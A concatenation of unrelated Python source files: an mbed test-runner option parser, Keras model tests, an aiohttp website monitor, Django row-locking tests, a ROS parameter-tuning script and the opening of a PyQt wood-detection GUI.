reset_methods_str = "Plugin support: " + ', '.join(reset_methods)
parser.add_option('-r', '--reset-type',
dest='mut_reset_type',
default=None,
help='Extra reset method used to reset MUT by host test script. %s'% reset_methods_str)
parser.add_option('-g', '--goanna-for-tests',
dest='goanna_for_tests',
metavar=False,
action="store_true",
help='Run Goanna static analyse tool for tests. (Project will be rebuilded)')
parser.add_option('-G', '--goanna-for-sdk',
dest='goanna_for_mbed_sdk',
metavar=False,
action="store_true",
help='Run Goanna static analyse tool for mbed SDK (Project will be rebuilded)')
parser.add_option('-s', '--suppress-summary',
dest='suppress_summary',
default=False,
action="store_true",
help='Suppresses display of wellformatted table with test results')
parser.add_option('-t', '--test-summary',
dest='test_x_toolchain_summary',
default=False,
action="store_true",
help='Displays wellformatted table with test x toolchain test result per target')
parser.add_option('-A', '--test-automation-report',
dest='test_automation_report',
default=False,
action="store_true",
help='Prints information about all tests and exits')
parser.add_option('-R', '--test-case-report',
dest='test_case_report',
default=False,
action="store_true",
help='Prints information about all test cases and exits')
parser.add_option("-S", "--supported-toolchains",
action="store_true",
dest="supported_toolchains",
default=False,
help="Displays supported matrix of MCUs and toolchains")
parser.add_option("-O", "--only-build",
action="store_true",
dest="only_build_tests",
default=False,
help="Only build tests, skips actual test procedures (flashing etc.)")
parser.add_option('', '--parallel',
dest='parallel_test_exec',
default=False,
action="store_true",
help='Experimental, you execute test runners for connected to your host MUTs in parallel (speeds up test result collection)')
parser.add_option('', '--config',
dest='verbose_test_configuration_only',
default=False,
action="store_true",
help='Displays full test specification and MUTs configration and exits')
parser.add_option('', '--loops',
dest='test_loops_list',
help='Set no. of loops per test. Format: TEST_1=1,TEST_2=2,TEST_3=3')
parser.add_option('', '--global-loops',
dest='test_global_loops_value',
help='Set global number of test loops per test. Default value is set 1')
parser.add_option('', '--consolidate-waterfall',
dest='consolidate_waterfall_test',
default=False,
action="store_true",
help='Used with --waterfall option. Adds only one test to report reflecting outcome of waterfall test.')
parser.add_option('-W', '--waterfall',
dest='waterfall_test',
default=False,
action="store_true",
help='Used with --loops or --global-loops options. Tests until OK result occurs and assumes test passed')
parser.add_option('-N', '--firmware-name',
dest='firmware_global_name',
help='Set global name for all produced projects. Note, proper file extension will be added by buid scripts')
parser.add_option('-u', '--shuffle',
dest='shuffle_test_order',
default=False,
action="store_true",
help='Shuffles test execution order')
parser.add_option('', '--shuffle-seed',
dest='shuffle_test_seed',
default=None,
help='Shuffle seed (If you want to reproduce your shuffle order please use seed provided in test summary)')
parser.add_option('-f', '--filter',
dest='general_filter_regex',
default=None,
help='For some commands you can use filter to filter out results')
parser.add_option('', '--inc-timeout',
dest='extend_test_timeout',
metavar="NUMBER",
type="int",
help='You can increase global timeout for each test by specifying additional test timeout in seconds')
parser.add_option('', '--db',
dest='db_url',
help='This specifies what database test suite uses to store its state. To pass DB connection info use database connection string. Example: \'mysql://username:password@127.0.0.1/db_name\'')
parser.add_option('-l', '--log',
dest='log_file_name',
help='Log events to external file (note not all console entries may be visible in log file)')
parser.add_option('', '--report-html',
dest='report_html_file_name',
help='You can log test suite results in form of HTML report')
parser.add_option('', '--report-junit',
dest='report_junit_file_name',
help='You can log test suite results in form of JUnit compliant XML report')
parser.add_option("", "--report-build",
dest="report_build_file_name",
help="Output the build results to a junit xml file")
parser.add_option('', '--verbose-skipped',
dest='verbose_skipped_tests',
default=False,
action="store_true",
help='Prints some extra information about skipped tests')
parser.add_option('-V', '--verbose-test-result',
dest='verbose_test_result_only',
default=False,
action="store_true",
help='Prints test serial output')
parser.add_option('-v', '--verbose',
dest='verbose',
default=False,
action="store_true",
help='Verbose mode (prints some extra information)')
parser.add_option('', '--version',
dest='version',
default=False,
action="store_true",
help='Prints script version and exits')
return parser
|
applications_test.py
|
import pytest
import random
import six
import numpy as np
import keras_applications
from keras.applications import densenet
from keras.applications import inception_resnet_v2
from keras.applications import inception_v3
from keras.applications import mobilenet
try:
from keras.applications import mobilenet_v2
except ImportError:
from keras.applications import mobilenetv2 as mobilenet_v2
from keras.applications import nasnet
from keras.applications import resnet50
from keras.applications import vgg16
from keras.applications import vgg19
from keras.applications import xception
from keras.preprocessing import image
from keras import backend
from keras import layers
from keras import models
from keras import utils
from multiprocessing import Process, Queue
def keras_modules_injection(base_fun):
def wrapper(*args, **kwargs):
kwargs['backend'] = backend
kwargs['layers'] = layers
kwargs['models'] = models
kwargs['utils'] = utils
return base_fun(*args, **kwargs)
return wrapper
for (name, module) in [('resnet', keras_applications.resnet),
('resnet_v2', keras_applications.resnet_v2),
('resnext', keras_applications.resnext),
('efficientnet', keras_applications.efficientnet),
('mobilenet_v3', keras_applications.mobilenet_v3)]:
module.decode_predictions = keras_modules_injection(module.decode_predictions)
module.preprocess_input = keras_modules_injection(module.preprocess_input)
for app in dir(module):
if app[0].isupper() and callable(getattr(module, app)):
setattr(module, app, keras_modules_injection(getattr(module, app)))
setattr(keras_applications, name, module)
RESNET_LIST = [keras_applications.resnet.ResNet50,
keras_applications.resnet.ResNet101,
keras_applications.resnet.ResNet152]
RESNETV2_LIST = [keras_applications.resnet_v2.ResNet50V2,
keras_applications.resnet_v2.ResNet101V2,
keras_applications.resnet_v2.ResNet152V2]
RESNEXT_LIST = [keras_applications.resnext.ResNeXt50,
keras_applications.resnext.ResNeXt101]
MOBILENET_LIST = [(mobilenet.MobileNet, mobilenet, 1024),
(mobilenet_v2.MobileNetV2, mobilenet_v2, 1280),
(keras_applications.mobilenet_v3.MobileNetV3Small,
keras_applications.mobilenet_v3, 576),
(keras_applications.mobilenet_v3.MobileNetV3Large,
keras_applications.mobilenet_v3, 960)]
DENSENET_LIST = [(densenet.DenseNet121, 1024),
(densenet.DenseNet169, 1664),
(densenet.DenseNet201, 1920)]
NASNET_LIST = [(nasnet.NASNetMobile, 1056),
(nasnet.NASNetLarge, 4032)]
EFFICIENTNET_LIST = [(keras_applications.efficientnet.EfficientNetB0, 1280),
(keras_applications.efficientnet.EfficientNetB1, 1280),
(keras_applications.efficientnet.EfficientNetB2, 1408),
(keras_applications.efficientnet.EfficientNetB3, 1536),
(keras_applications.efficientnet.EfficientNetB4, 1792),
(keras_applications.efficientnet.EfficientNetB5, 2048)]
def keras_test(func):
"""Function wrapper to clean up after TensorFlow tests.
# Arguments
func: test function to clean up after.
# Returns
A function wrapping the input function.
"""
@six.wraps(func)
def wrapper(*args, **kwargs):
output = func(*args, **kwargs)
if backend.backend() == 'tensorflow' or backend.backend() == 'cntk':
backend.clear_session()
return output
return wrapper
def _get_elephant(target_size):
# For models that don't include a Flatten step,
# the default is to accept variable-size inputs
# even when loading ImageNet weights (since it is possible).
# In this case, default to 299x299.
if target_size[0] is None:
target_size = (299, 299)
img = image.load_img('tests/data/elephant.jpg',
target_size=tuple(target_size))
x = image.img_to_array(img)
return np.expand_dims(x, axis=0)
def _get_output_shape(model_fn, preprocess_input=None):
if backend.backend() == 'cntk':
# Create model in a subprocess so that
# the memory consumed by InceptionResNetV2 will be
# released back to the system after this test
# (to deal with OOM error on CNTK backend).
# TODO: remove the use of multiprocessing from these tests
# once a memory clearing mechanism
# is implemented in the CNTK backend.
def target(queue):
model = model_fn()
if preprocess_input is None:
queue.put(model.output_shape)
else:
x = _get_elephant(model.input_shape[1:3])
x = preprocess_input(x)
queue.put((model.output_shape, model.predict(x)))
queue = Queue()
p = Process(target=target, args=(queue,))
p.start()
p.join()
# The error in a subprocess won't propagate
# to the main process, so we check if the model
# is successfully created by checking if the output shape
# has been put into the queue
assert not queue.empty(), 'Model creation failed.'
return queue.get_nowait()
else:
model = model_fn()
if preprocess_input is None:
return model.output_shape
else:
x = _get_elephant(model.input_shape[1:3])
x = preprocess_input(x)
return (model.output_shape, model.predict(x))
@keras_test
def _test_application_basic(app, last_dim=1000, module=None):
if module is None:
output_shape = _get_output_shape(lambda: app(weights=None))
assert output_shape == (None, None, None, last_dim)
else:
output_shape, preds = _get_output_shape(
lambda: app(weights='imagenet'), module.preprocess_input)
assert output_shape == (None, last_dim)
names = [p[1] for p in module.decode_predictions(preds)[0]]
# Test correct label is in top 3 (weak correctness test).
assert 'African_elephant' in names[:3]
@keras_test
def _test_application_notop(app, last_dim):
output_shape = _get_output_shape(
lambda: app(weights=None, include_top=False))
assert output_shape == (None, None, None, last_dim)
@keras_test
def _test_application_variable_input_channels(app, last_dim):
if backend.image_data_format() == 'channels_first':
input_shape = (1, None, None)
else:
input_shape = (None, None, 1)
output_shape = _get_output_shape(
lambda: app(weights=None, include_top=False, input_shape=input_shape))
assert output_shape == (None, None, None, last_dim)
if backend.image_data_format() == 'channels_first':
input_shape = (4, None, None)
else:
input_shape = (None, None, 4)
output_shape = _get_output_shape(
lambda: app(weights=None, include_top=False, input_shape=input_shape))
assert output_shape == (None, None, None, last_dim)
@keras_test
def _test_app_pooling(app, last_dim):
output_shape = _get_output_shape(
lambda: app(weights=None,
include_top=False,
pooling=random.choice(['avg', 'max'])))
assert output_shape == (None, last_dim)
def test_resnet():
app = random.choice(RESNET_LIST)
module = keras_applications.resnet
last_dim = 2048
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_resnetv2():
app = random.choice(RESNETV2_LIST)
module = keras_applications.resnet_v2
last_dim = 2048
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_resnext():
app = random.choice(RESNEXT_LIST)
module = keras_applications.resnext
last_dim = 2048
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_vgg():
app = random.choice([vgg16.VGG16, vgg19.VGG19])
module = vgg16
last_dim = 512
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_xception():
app = xception.Xception
module = xception
last_dim = 2048
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_inceptionv3():
app = inception_v3.InceptionV3
module = inception_v3
last_dim = 2048
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_inceptionresnetv2():
app = inception_resnet_v2.InceptionResNetV2
module = inception_resnet_v2
last_dim = 1536
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_mobilenet():
app, module, last_dim = random.choice(MOBILENET_LIST)
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_densenet():
app, last_dim = random.choice(DENSENET_LIST)
module = densenet
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_nasnet():
app, last_dim = NASNET_LIST[0] # NASNetLarge is too heavy to test on Travis
module = nasnet
_test_application_basic(app, module=module)
# _test_application_notop(app, last_dim)
# _test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
def test_efficientnet():
app, last_dim = random.choice(EFFICIENTNET_LIST)
module = keras_applications.efficientnet
_test_application_basic(app, module=module)
_test_application_notop(app, last_dim)
_test_application_variable_input_channels(app, last_dim)
_test_app_pooling(app, last_dim)
if __name__ == '__main__':
pytest.main([__file__])
|
web_monitor.py
|
"""
Creates the logger, processes and threads, initializes everything
"""
import asyncio
import logging
import time
from multiprocessing import Process
import aiohttp
import async_timeout
from src.web_monitor.server import server
from src.web_monitor.utils.custom_errors import ConnectionProblem
async def fetch(session, url, timeout_s, content):
log = logging.getLogger(__name__)
try:
with async_timeout.timeout(timeout_s):
start_time = time.time()
async with session.get(url) as response:
if response.status != 200:
raise ConnectionProblem(url, "HTML status code: %s".format(response.status))
text = await response.text()
end_time = time.time()
except ConnectionProblem as ex:
raise ex
except (asyncio.TimeoutError, aiohttp.ClientConnectorError) as ex:
if isinstance(ex, asyncio.TimeoutError):
msg = type(ex)
else:
msg = str(ex)
raise ConnectionProblem(url, msg)
content_ok = content in text
log.info('%s\t%s\t%s', url, content_ok, end_time - start_time)
async def do_request(url, period_ms, timeout_s, content):
async with aiohttp.ClientSession() as session:
log = logging.getLogger(__name__)
while True:
await asyncio.sleep(period_ms / 1000)
future = asyncio.ensure_future(fetch(session, url, timeout_s, content))
def callback(fut):
ex = fut.exception()
if isinstance(ex, ConnectionProblem):
log.error('%s\tConnection problem\tSpecific error: %s', ex.url, ex.error_msg)
elif ex:
log.critical('%s\tUNKNOWN ERROR', url)
future.add_done_callback(callback)
def start_app(config):
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
console_h = logging.StreamHandler()
console_h.setLevel(logging.DEBUG)
log_path = config['general']['log_path']
file_h = logging.FileHandler(log_path, 'w')
file_h.setLevel(config['general']['file_log_level'])
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
console_h.setFormatter(formatter)
file_h.setFormatter(formatter)
log.addHandler(console_h)
log.addHandler(file_h)
period_ms = int(config['general']['checking_period'])
timeout_s = int(config['general']['timeout'])
web_dict = config['url_content']
loop = asyncio.get_event_loop()
futures = []
for url, content in web_dict.items():
log.debug('Key: %s', url)
future = asyncio.ensure_future(do_request(url, period_ms, timeout_s, content))
futures.append(future)
loop.run_until_complete(asyncio.gather(*futures, return_exceptions=True))
def main(config):
processes = []
server_process = Process(target=server.create_app)
server_process.start()
processes.append(server_process)
requests_process = Process(target=start_app, args=(config,))
requests_process.start()
for server_process in processes:
server_process.join()
|
tests.py
|
from __future__ import unicode_literals
import sys
import time
import unittest
from django.conf import settings
from django.db import transaction, connection
from django.db.utils import ConnectionHandler, DEFAULT_DB_ALIAS, DatabaseError
from django.test import (TransactionTestCase, skipIfDBFeature,
skipUnlessDBFeature)
from .models import Person
# Some tests require threading, which might not be available. So create a
# skip-test decorator for those test functions.
try:
import threading
except ImportError:
threading = None
requires_threading = unittest.skipUnless(threading, 'requires threading')
class SelectForUpdateTests(TransactionTestCase):
available_apps = ['select_for_update']
def setUp(self):
transaction.enter_transaction_management()
self.person = Person.objects.create(name='Reinhardt')
# We have to commit here so that code in run_select_for_update can
# see this data.
transaction.commit()
# We need another database connection to test that one connection
# issuing a SELECT ... FOR UPDATE will block.
new_connections = ConnectionHandler(settings.DATABASES)
self.new_connection = new_connections[DEFAULT_DB_ALIAS]
self.new_connection.enter_transaction_management()
# We need to set settings.DEBUG to True so we can capture
# the output SQL to examine.
self._old_debug = settings.DEBUG
settings.DEBUG = True
def tearDown(self):
try:
# We don't really care if this fails - some of the tests will set
# this in the course of their run.
transaction.abort()
self.new_connection.abort()
except transaction.TransactionManagementError:
pass
self.new_connection.close()
settings.DEBUG = self._old_debug
try:
self.end_blocking_transaction()
except (DatabaseError, AttributeError):
pass
def start_blocking_transaction(self):
# Start a blocking transaction. At some point,
# end_blocking_transaction() should be called.
self.cursor = self.new_connection.cursor()
sql = 'SELECT * FROM %(db_table)s %(for_update)s;' % {
'db_table': Person._meta.db_table,
'for_update': self.new_connection.ops.for_update_sql(),
}
self.cursor.execute(sql, ())
self.cursor.fetchone()
def end_blocking_transaction(self):
# Roll back the blocking transaction.
self.new_connection.rollback()
def has_for_update_sql(self, tested_connection, nowait=False):
# Examine the SQL that was executed to determine whether it
# contains the 'SELECT..FOR UPDATE' stanza.
for_update_sql = tested_connection.ops.for_update_sql(nowait)
sql = tested_connection.queries[-1]['sql']
return bool(sql.find(for_update_sql) > -1)
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_sql_generated(self):
"""
Test that the backend's FOR UPDATE variant appears in
generated SQL when select_for_update is invoked.
"""
list(Person.objects.all().select_for_update())
self.assertTrue(self.has_for_update_sql(connection))
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_for_update_sql_generated_nowait(self):
"""
Test that the backend's FOR UPDATE NOWAIT variant appears in
generated SQL when select_for_update is invoked.
"""
list(Person.objects.all().select_for_update(nowait=True))
self.assertTrue(self.has_for_update_sql(connection, nowait=True))
@requires_threading
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_nowait_raises_error_on_block(self):
"""
If nowait is specified, we expect an error to be raised rather
than blocking.
"""
self.start_blocking_transaction()
status = []
thread = threading.Thread(
target=self.run_select_for_update,
args=(status,),
kwargs={'nowait': True},
)
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], DatabaseError)
@skipIfDBFeature('has_select_for_update_nowait')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_nowait_raises_error(self):
"""
If a SELECT...FOR UPDATE NOWAIT is run on a database backend
that supports FOR UPDATE but not NOWAIT, then we should find
that a DatabaseError is raised.
"""
self.assertRaises(
DatabaseError,
list,
Person.objects.all().select_for_update(nowait=True)
)
def run_select_for_update(self, status, nowait=False):
"""
Utility method that runs a SELECT FOR UPDATE against all
Person instances. After the select_for_update, it attempts
to update the name of the only record, save, and commit.
This function expects to run in a separate thread.
"""
status.append('started')
try:
# We need to enter transaction management again, as this is done on
# per-thread basis
transaction.enter_transaction_management()
people = list(
Person.objects.all().select_for_update(nowait=nowait)
)
people[0].name = 'Fred'
people[0].save()
transaction.commit()
except DatabaseError as e:
status.append(e)
finally:
# This method is run in a separate thread. It uses its own
# database connection. Close it without waiting for the GC.
transaction.abort()
connection.close()
@requires_threading
@skipUnlessDBFeature('has_select_for_update')
@skipUnlessDBFeature('supports_transactions')
def test_block(self):
"""
Check that a thread running a select_for_update that
accesses rows being touched by a similar operation
on another connection blocks correctly.
"""
# First, let's start the transaction in our thread.
self.start_blocking_transaction()
# Now, try it again using the ORM's select_for_update
# facility. Do this in a separate thread.
status = []
thread = threading.Thread(
target=self.run_select_for_update, args=(status,)
)
# The thread should immediately block, but we'll sleep
# for a bit to make sure.
thread.start()
sanity_count = 0
while len(status) != 1 and sanity_count < 10:
sanity_count += 1
time.sleep(1)
if sanity_count >= 10:
raise ValueError('Thread did not run and block')
# Check the person hasn't been updated. Since this isn't
# using FOR UPDATE, it won't block.
p = Person.objects.get(pk=self.person.pk)
self.assertEqual('Reinhardt', p.name)
# When we end our blocking transaction, our thread should
# be able to continue.
self.end_blocking_transaction()
thread.join(5.0)
# Check the thread has finished. Assuming it has, we should
# find that it has updated the person's name.
self.assertFalse(thread.isAlive())
# We must commit the transaction to ensure that MySQL gets a fresh read,
# since by default it runs in REPEATABLE READ mode
transaction.commit()
p = Person.objects.get(pk=self.person.pk)
self.assertEqual('Fred', p.name)
@requires_threading
@skipUnlessDBFeature('has_select_for_update')
def test_raw_lock_not_available(self):
"""
Check that running a raw query which can't obtain a FOR UPDATE lock
raises the correct exception
"""
self.start_blocking_transaction()
def raw(status):
try:
list(
Person.objects.raw(
'SELECT * FROM %s %s' % (
Person._meta.db_table,
connection.ops.for_update_sql(nowait=True)
)
)
)
except DatabaseError as e:
status.append(e)
finally:
# This method is run in a separate thread. It uses its own
# database connection. Close it without waiting for the GC.
connection.close()
status = []
thread = threading.Thread(target=raw, kwargs={'status': status})
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], DatabaseError)
@skipUnlessDBFeature('has_select_for_update')
def test_transaction_dirty_managed(self):
""" Check that a select_for_update sets the transaction to be
dirty when executed under txn management. Setting the txn dirty
means that it will be either committed or rolled back by Django,
which will release any locks held by the SELECT FOR UPDATE.
"""
people = list(Person.objects.select_for_update())
self.assertTrue(transaction.is_dirty())
|
tunerScriptDeletion.py
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2015, Fabian Girrbach, Social Robotics Lab, University of Freiburg
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Dependencies for ROS
import rospy
import rospkg
from std_msgs.msg import Float32, Bool
# Other dependencies
import yaml
from collections import namedtuple
from time import time, sleep
import subprocess
from signal import SIGKILL, SIGTERM
import os
from multiprocessing import Process, Pipe
# PySMAC
import pysmac
# definition of parameters which should be optimized
parameters_to_optimize=dict(\
track_is_mature_after_total_num_matches=("integer", [1, 300], 100), # same as x1, but the initial value is -1
max_occlusions_before_deletion_of_mature_track=("integer", [1, 250], 50), # same as x1, but the initial value is -1
max_occlusions_before_deletion=("integer", [1, 250], 20), # same as x1, but the initial value is -1
process_noise_level=("real", [1e-5, 2.5], 0.1), # same as x1, but the initial value is -1
measurement_noise=("real", [1e-5, 2.5], 0.1), # same as x1, but the initial value is -1
)
# list of files where the parameters for the optimization should be found
parameter_files_to_search = ['/launch/params/occlusion_manager_basic_tuning.yaml', '/launch/params/ekf_tuning.yaml',]
# list of ros package names where parameters can be found
packages_for_paramteres = ['srl_nearest_neighbor_tracker']
# roslaunch commands for several instances where tuning should happen
roslaunch_commands = [['roslaunch', 'srl_nearest_neighbor_tracker' , 'pedsim_tuning.launch']]
# List of forbidden configuations
forbidden_clauses = ['{(max_occlusions_before_deletion_of_mature_track < max_occlusions_before_deletion)}']
parameter_list = []
fail_result = -1.0
mota_result = -1.0
def find_parameters():
# get an instance of RosPack with the default search paths
rospack = rospkg.RosPack()
for package_name in packages_for_paramteres:
package_path = rospack.get_path(package_name)
for file in parameter_files_to_search:
param_file = package_path + file
try:
params_in_file = yaml.load(open(param_file))
for param_key in parameters_to_optimize:
if param_key in params_in_file:
print 'Found {} in {} paramfile {}'.format(param_key, param_file, parameters_to_optimize[param_key])
new_param = {'name':param_key, 'path':param_file, 'default':parameters_to_optimize[param_key][-1], 'current':50}
parameter_list.append(new_param)
except:
pass
def write_parameters():
print "inside write parameters"
for param in parameter_list:
print "current param {}".format(param)
with open(param['path'], 'r') as param_file:
params_in_file = yaml.load(param_file)
params_in_file[param['name']] = param['current']
with open(param['path'], 'w') as param_file:
param_file.write(yaml.dump(params_in_file, default_flow_style=True) )
def resultCallback(result):
print "PyMot results received {}".format(result)
global mota_result, proces_sim
mota_result = result.data
os.killpg(process_sim.pid, SIGTERM)
sleep(3)
rospy.signal_shutdown('Mota result received')
def clean_ros_logs():
# After many iterations ros gathered a lot of log files therfore we clean them after each iteration
subprocess.call(['rosclean','purge','-y'])
def start_node(child_conn, ros_command):
clean_ros_logs()
# launch tracker and everything which comes with it
global process_sim, mota_result
mota_result = fail_result
process_sim = subprocess.Popen(ros_command, preexec_fn=os.setsid)
node = rospy.init_node('tuning_node', anonymous=True)
while rospy.is_shutdown():
print 'Waiting for ROS to start'
sleep(1)
rospy.Subscriber("/pymot_result", Float32, resultCallback)
rospy.spin()
sleep(3)
tuning_object = dict()
tuning_object['result'] = mota_result
child_conn.send(tuning_object)
def optimize_parameters(**kwargs):
print "Function was called with arguments: {}".format(kwargs)
# Modify values in parameter list depending on passed values
for arg in kwargs.keys():
print "Current key argument: {}".format(arg)
if arg == "instance":
roslaunch_command = roslaunch_commands[kwargs[arg]]
print "Current ROS Launch command is {}".format(roslaunch_command)
continue
try:
current = next(param for param in parameter_list if param['name']==arg)
current['current'] = kwargs[arg]
except:
pass
write_parameters()
sleep(0.5)
parent_conn, child_conn = Pipe()
p = Process(target=start_node, args=(child_conn,roslaunch_command,))
p.start()
result = parent_conn.recv()
print 'Received current result {}'.format(result['result'])
p.join()
p.terminate()
return -result['result']
def init_optimization():
opt = pysmac.SMAC_optimizer(working_directory= '/home/fabian/tuning_deletion_logic/',persistent_files=True, debug = False)
parameter_definition= parameters_to_optimize
print parameter_definition
value, parameters = opt.minimize(optimize_parameters # the function to be minimized
, 500 # the maximum number of function evaluations
, parameter_definition # dict of parmaeter definition
, forbidden_clauses=forbidden_clauses # list of forbidden clauses
, t_limit_function_s=360 # time limit cor one tuning iteration
, num_runs=2 # number of independent tuning runs
, num_train_instances=len(roslaunch_commands) # number of datasets used for tuning
, deterministic=True) # deterministic results
print('The minimum value %f was found for the configurations %s'%(value, parameters))
for param_key in parameters.keys():
try:
current = next(param for param in parameter_list if param['name']==param_key)
current['current'] = parameters[param_key]
except:
pass
print("Writing best parameter configuration to param file(s) {}".format(parameter_files_to_search))
write_parameters()
print("Exited sucessfully!")
if __name__ == '__main__':
try:
find_parameters()
init_optimization()
except rospy.ROSInterruptException:
pass
|
detection._po.py
|
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QFileDialog, QMessageBox
from PyQt5.QtCore import QTimer
from scripts import config
if config.DEBUG:
from scripts.wood_detection import Ui_dialog
from scripts.parameter import Ui_Dialog_Child
from scripts.notes import Ui_Dialog_Notes
from scripts.utils import new_show_result, show_result, new_show_result_2, new_show_result_3, creat_match_graph_txt, \
get_result_from_meger_file
from scripts.utils import new_show_result_21
from scripts.merger_result_old import get_final_result, get_final_result_multirows
import scripts.utils
else:
from scripts.wood_detection import Ui_dialog
from scripts.parameter import Ui_Dialog_Child
from scripts.notes import Ui_Dialog_Notes
from scripts.utils import new_show_result, show_result, new_show_result_2,new_show_result_3, creat_match_graph_txt, get_result_from_meger_file
from scripts.utils import new_show_result_21
# from scripts.merger_result import get_final_result, get_final_result_multirows
from scripts.merger_result_v2 import get_final_result,get_final_result_multirows
import scripts.utils
from PIL import Image
import cv2
import numpy as np
import threading
import time
import shutil
from scripts.softp import SoftwareProtecttion
import pyrealsense2 as pr
#继承原始的设计类,添加相关的控件回调函数
#方便修改前面界面和后面回调函数,界面布局原始类发生变化只要直接替换wood_detection_ui.py就行
#需要确定每个控件的object_name,保持一致性.这里采用了默认的命名方式
#######################################################
# 图像控件:pushButton
# 检测控件:pushButton_2
# 暂停控件:pushButton_3
# 原始图窗控件:graphicsView
# 检测图窗控件:graphicsView_2
class Detection_Notes(QDialog, Ui_Dialog_Notes):
def __init__(self):
super(Detection_Notes, self).__init__()
self.setupUi(self)
class Detection_Child(QDialog, Ui_Dialog_Child):
def __init__(self):
super(Detection_Child, self).__init__()
self.setupUi(self)
self.checkBox.setChecked(True)
self.horizontalSlider_9.setEnabled(False)
self.checkBox.clicked.connect(self.adjust)
self.pushButton.clicked.connect(self.reset)
self.expos = True
self.expos_init = [0, 50, 64, 300, 0, 64, 50, 4600]
self.reset_flag = False
def adjust(self):
if self.checkBox.isChecked() == False:
self.expos = False
self.horizontalSlider_9.setEnabled(True)
else:
self.expos = True
self.horizontalSlider_9.setEnabled(False)
def update(self):
if self.reset_flag == True:
self.reset_flag = False
return self.expos_init
brightness = self.horizontalSlider.value()
contrast = self.horizontalSlider_2.value()
grain = self.horizontalSlider_3.value()
gamma = self.horizontalSlider_4.value()
hue = self.horizontalSlider_5.value()
staturation = self.horizontalSlider_7.value()
sharpness = self.horizontalSlider_8.value()
white_balance = self.horizontalSlider_6.value()
results = [brightness, contrast, grain, gamma, hue, staturation, sharpness, white_balance]
return results
def exposfun(self):
if self.reset_flag == True:
self.expos = True
return 'reset'
expos = 0
if self.expos == False:
expos = self.horizontalSlider_9.value()
else:
return 'auto'
return expos
def reset(self):
self.horizontalSlider.setValue(self.expos_init[0])
self.horizontalSlider_2.setValue(self.expos_init[1])
self.horizontalSlider_3.setValue(self.expos_init[2])
self.horizontalSlider_4.setValue(self.expos_init[3])
self.horizontalSlider_5.setValue(self.expos_init[4])
self.horizontalSlider_7.setValue(self.expos_init[5])
self.horizontalSlider_8.setValue(self.expos_init[6])
self.horizontalSlider_6.setValue(self.expos_init[7])
self.horizontalSlider_9.setEnabled(False)
self.checkBox.setChecked(True)
self.reset_flag = True
class Detection_Ui(QtWidgets.QMainWindow,Ui_dialog):
def __init__(self):
super(Detection_Ui, self).__init__()
self.setupUi(self)
#设置控件的回调函数
# 添加回调函数 后面改为继承
#software protection
self.softp = SoftwareProtecttion(elapsed_time=90, elapsed_time_flag=True, mac_protection_flag=False)
self.child = Detection_Child()
self.notes = Detection_Notes()
self.timer = QTimer()
self.org_img = None
self.img_list = []
self.img_list_raw = []
self.isimage = True
self.isvideo = False
self.ismulti = False
self.issaveimage = False
self.savevideo_flag = False
self.save_woods_nums = 1
self.image_num = 0
self.video_reset = False
self.paly_terminate_flag = False
